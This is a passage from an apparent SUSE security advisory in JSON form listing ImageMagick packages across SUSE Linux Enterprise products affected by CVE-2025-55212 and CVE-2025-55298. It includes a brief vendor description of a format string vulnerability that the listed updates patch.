"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "moderate"
}
],
"title": "CVE-2025-55212"
},
{
"cve": "CVE-2025-55298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55298"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to ImageMagick versions 6.9.13-28 and 7.1.2-2, a format string bug vulnerability exists in InterpretImageFilename function where user input is directly passed to FormatLocaleString without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
